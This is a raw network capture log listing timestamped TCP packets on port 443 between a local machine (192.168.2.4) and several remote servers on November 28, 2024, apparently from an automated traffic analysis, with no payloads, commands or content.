                                                                                                                                          Nov 28, 2024 11:32:16.002474070 CET44349752104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.010576010 CET44349752104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.010629892 CET49752443192.168.2.4104.18.11.207
                                                                                                                                          Nov 28, 2024 11:32:16.010643959 CET44349752104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.014216900 CET44349753104.18.10.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.014252901 CET44349753104.18.10.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.014291048 CET49753443192.168.2.4104.18.10.207
                                                                                                                                          Nov 28, 2024 11:32:16.014298916 CET44349753104.18.10.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.014349937 CET49753443192.168.2.4104.18.10.207
                                                                                                                                          Nov 28, 2024 11:32:16.022569895 CET44349753104.18.10.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.030941963 CET44349753104.18.10.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.031035900 CET44349753104.18.10.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.031075954 CET49753443192.168.2.4104.18.10.207
                                                                                                                                          Nov 28, 2024 11:32:16.031085968 CET44349753104.18.10.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.031132936 CET49753443192.168.2.4104.18.10.207
                                                                                                                                          Nov 28, 2024 11:32:16.039324045 CET44349753104.18.10.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.046706915 CET49759443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:16.046710014 CET49760443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:16.046725035 CET44349759104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.046746016 CET44349760104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.047754049 CET44349753104.18.10.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.047808886 CET49759443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:16.047816992 CET49760443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:16.048118114 CET49753443192.168.2.4104.18.10.207
                                                                                                                                          Nov 28, 2024 11:32:16.048125982 CET44349753104.18.10.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.048130035 CET49760443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:16.048137903 CET44349760104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.050770044 CET49759443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:16.050785065 CET44349759104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.056253910 CET44349753104.18.10.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.056745052 CET49753443192.168.2.4104.18.10.207
                                                                                                                                          Nov 28, 2024 11:32:16.056756020 CET44349753104.18.10.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.062769890 CET49752443192.168.2.4104.18.11.207
                                                                                                                                          Nov 28, 2024 11:32:16.062778950 CET44349752104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.064692974 CET44349753104.18.10.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.068757057 CET49753443192.168.2.4104.18.10.207
                                                                                                                                          Nov 28, 2024 11:32:16.068763971 CET44349753104.18.10.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.073122978 CET44349753104.18.10.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.076524973 CET49753443192.168.2.4104.18.10.207
                                                                                                                                          Nov 28, 2024 11:32:16.076531887 CET44349753104.18.10.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.106756926 CET49752443192.168.2.4104.18.11.207
                                                                                                                                          Nov 28, 2024 11:32:16.117799997 CET44349752104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.117914915 CET44349752104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.118417978 CET49752443192.168.2.4104.18.11.207
                                                                                                                                          Nov 28, 2024 11:32:16.118688107 CET49752443192.168.2.4104.18.11.207
                                                                                                                                          Nov 28, 2024 11:32:16.118710041 CET44349752104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.122049093 CET49753443192.168.2.4104.18.10.207
                                                                                                                                          Nov 28, 2024 11:32:16.186682940 CET44349753104.18.10.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.190514088 CET44349753104.18.10.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.190635920 CET49753443192.168.2.4104.18.10.207
                                                                                                                                          Nov 28, 2024 11:32:16.190644979 CET44349753104.18.10.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.198313951 CET44349753104.18.10.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.198395967 CET44349753104.18.10.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.198555946 CET49753443192.168.2.4104.18.10.207
                                                                                                                                          Nov 28, 2024 11:32:16.200746059 CET49753443192.168.2.4104.18.10.207
                                                                                                                                          Nov 28, 2024 11:32:16.200752974 CET44349753104.18.10.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.263868093 CET49764443192.168.2.4104.18.10.207
                                                                                                                                          Nov 28, 2024 11:32:16.263899088 CET44349764104.18.10.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.264070988 CET49764443192.168.2.4104.18.10.207
                                                                                                                                          Nov 28, 2024 11:32:16.264442921 CET49764443192.168.2.4104.18.10.207
                                                                                                                                          Nov 28, 2024 11:32:16.264458895 CET44349764104.18.10.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.363655090 CET49765443192.168.2.413.227.8.72
                                                                                                                                          Nov 28, 2024 11:32:16.363665104 CET49766443192.168.2.4104.18.11.207
                                                                                                                                          Nov 28, 2024 11:32:16.363693953 CET4434976513.227.8.72192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.363693953 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.363763094 CET49765443192.168.2.413.227.8.72
                                                                                                                                          Nov 28, 2024 11:32:16.363770962 CET49766443192.168.2.4104.18.11.207
                                                                                                                                          Nov 28, 2024 11:32:16.364123106 CET49765443192.168.2.413.227.8.72
                                                                                                                                          Nov 28, 2024 11:32:16.364139080 CET4434976513.227.8.72192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.364295006 CET49766443192.168.2.4104.18.11.207
                                                                                                                                          Nov 28, 2024 11:32:16.364311934 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.373436928 CET49768443192.168.2.4142.250.181.100
                                                                                                                                          Nov 28, 2024 11:32:16.373444080 CET44349768142.250.181.100192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.373506069 CET49768443192.168.2.4142.250.181.100
                                                                                                                                          Nov 28, 2024 11:32:16.373816967 CET49768443192.168.2.4142.250.181.100
                                                                                                                                          Nov 28, 2024 11:32:16.373827934 CET44349768142.250.181.100192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.550945997 CET44349738142.250.181.100192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.551004887 CET44349738142.250.181.100192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.551165104 CET49738443192.168.2.4142.250.181.100
                                                                                                                                          Nov 28, 2024 11:32:16.588838100 CET44349755151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.589718103 CET49755443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:16.589730024 CET44349755151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.590711117 CET44349755151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.590848923 CET49755443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:16.591114998 CET49755443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:16.591182947 CET44349755151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.591295004 CET49755443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:16.635335922 CET44349755151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.637020111 CET49755443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:16.637027025 CET44349755151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.683609009 CET49755443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:16.805767059 CET49738443192.168.2.4142.250.181.100
                                                                                                                                          Nov 28, 2024 11:32:16.805777073 CET44349738142.250.181.100192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.022448063 CET44349755151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.037847042 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.038177013 CET49756443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.038188934 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.039153099 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.039541960 CET49756443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.039541960 CET49756443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.039612055 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.039680004 CET49756443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.073676109 CET49755443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.083337069 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.089324951 CET49756443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.089370012 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.136310101 CET49756443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.142406940 CET44349755151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.142417908 CET44349755151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.142446041 CET44349755151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.142458916 CET44349755151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.142469883 CET44349755151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.142513990 CET49755443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.142523050 CET44349755151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.142568111 CET49755443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.250565052 CET44349755151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.250576019 CET44349755151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.250605106 CET44349755151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.250614882 CET44349755151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.250639915 CET49755443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.250649929 CET44349755151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.250683069 CET49755443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.250690937 CET49755443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.295758009 CET44349758151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.297538042 CET49758443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.297559023 CET44349758151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.298551083 CET44349758151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.298618078 CET49758443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.303230047 CET49758443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.303318977 CET44349758151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.303371906 CET49758443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.304107904 CET44349760104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.306323051 CET49760443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:17.306343079 CET44349760104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.307306051 CET44349760104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.307360888 CET49760443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:17.307446957 CET44349759104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.309334040 CET49759443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:17.309349060 CET44349759104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.310313940 CET44349759104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.310368061 CET49759443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:17.312639952 CET49760443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:17.312699080 CET44349760104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.317944050 CET49759443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:17.318005085 CET44349759104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.318062067 CET49760443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:17.318068981 CET44349760104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.318105936 CET49759443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:17.318114042 CET44349759104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.343496084 CET49758443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.343511105 CET44349758151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.359119892 CET49760443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:17.362807035 CET49759443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:17.385746956 CET49758443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.406569958 CET44349755151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.406583071 CET44349755151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.406610966 CET44349755151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.406649113 CET49755443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.406656981 CET44349755151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.406683922 CET49755443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.406702042 CET49755443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.432849884 CET44349755151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.432867050 CET44349755151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.432904959 CET49755443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.432913065 CET44349755151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.432946920 CET49755443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.432976007 CET49755443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.463675022 CET44349755151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.463690996 CET44349755151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.463731050 CET49755443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.463737965 CET44349755151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.463768959 CET49755443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.463783979 CET49755443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.472417116 CET44349755151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.472471952 CET49755443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.472477913 CET44349755151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.472493887 CET44349755151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.472543955 CET49755443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.472794056 CET49755443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.472800970 CET44349755151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.481895924 CET44349764104.18.10.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.482091904 CET49764443192.168.2.4104.18.10.207
                                                                                                                                          Nov 28, 2024 11:32:17.482103109 CET44349764104.18.10.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.485419035 CET44349764104.18.10.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.485486031 CET49764443192.168.2.4104.18.10.207
                                                                                                                                          Nov 28, 2024 11:32:17.486356020 CET49764443192.168.2.4104.18.10.207
                                                                                                                                          Nov 28, 2024 11:32:17.486442089 CET44349764104.18.10.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.486555099 CET49764443192.168.2.4104.18.10.207
                                                                                                                                          Nov 28, 2024 11:32:17.486562967 CET44349764104.18.10.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.492412090 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.492465019 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.492510080 CET49756443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.492518902 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.492677927 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.492721081 CET49756443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.492728949 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.510889053 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.510919094 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.510934114 CET49756443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.510946035 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.510986090 CET49756443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.514993906 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.523426056 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.523459911 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.523471117 CET49756443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.523478985 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.523514986 CET49756443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.527937889 CET49764443192.168.2.4104.18.10.207
                                                                                                                                          Nov 28, 2024 11:32:17.612379074 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.623972893 CET49754443192.168.2.420.109.210.53
                                                                                                                                          Nov 28, 2024 11:32:17.634985924 CET49770443192.168.2.454.226.114.88
                                                                                                                                          Nov 28, 2024 11:32:17.635004044 CET4434977054.226.114.88192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.635068893 CET49770443192.168.2.454.226.114.88
                                                                                                                                          Nov 28, 2024 11:32:17.635262012 CET49770443192.168.2.454.226.114.88
                                                                                                                                          Nov 28, 2024 11:32:17.635273933 CET4434977054.226.114.88192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.666634083 CET49756443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.667336941 CET4434975420.109.210.53192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.702749968 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.708336115 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.708404064 CET49756443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.708412886 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.716423988 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.716459990 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.716489077 CET49756443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.716497898 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.716541052 CET49756443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.724553108 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.733081102 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.733133078 CET49756443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.733141899 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.740958929 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.741007090 CET49756443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.741014957 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.748615026 CET44349758151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.749219894 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.749272108 CET49756443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.749283075 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.749284983 CET44349758151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.749330997 CET49758443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.749339104 CET44349758151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.749481916 CET44349758151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.749516964 CET44349758151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.749521971 CET49758443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.749532938 CET44349758151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.749572039 CET49758443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.755508900 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.755565882 CET49756443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.755575895 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.756061077 CET44349760104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.756112099 CET44349760104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.756143093 CET44349760104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.756156921 CET49760443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:17.756174088 CET44349760104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.756217957 CET49760443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:17.756309986 CET44349760104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.760396957 CET44349759104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.760452032 CET44349759104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.760484934 CET44349759104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.760495901 CET49759443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:17.760513067 CET44349759104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.760546923 CET44349759104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.760556936 CET49759443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:17.760565996 CET44349759104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.760613918 CET49759443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:17.764440060 CET44349760104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.764494896 CET49760443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:17.764503002 CET44349760104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.767214060 CET44349758151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.768384933 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.768429041 CET49756443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.768436909 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.768758059 CET44349759104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.771421909 CET44349758151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.771469116 CET49758443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.771477938 CET44349758151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.772927999 CET44349760104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.772974014 CET49760443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:17.772979975 CET44349760104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.774857998 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.774910927 CET49756443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.774920940 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.777225971 CET44349759104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.777281046 CET49759443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:17.777290106 CET44349759104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.778225899 CET44349758151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.778280973 CET49758443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.778289080 CET44349758151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.781313896 CET44349760104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.781322002 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.781374931 CET49760443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:17.781375885 CET49756443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.781380892 CET44349760104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.781383991 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.785588026 CET44349759104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.785634041 CET49759443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:17.785640955 CET44349759104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.787900925 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.787934065 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.787976027 CET49756443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.787986040 CET44349756151.101.130.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.788033962 CET49756443192.168.2.4151.101.130.137
                                                                                                                                          Nov 28, 2024 11:32:17.789655924 CET44349760104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.789717913 CET49760443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:17.789722919 CET44349760104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.789773941 CET44349760104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.789823055 CET49760443192.168.2.4104.17.24.14
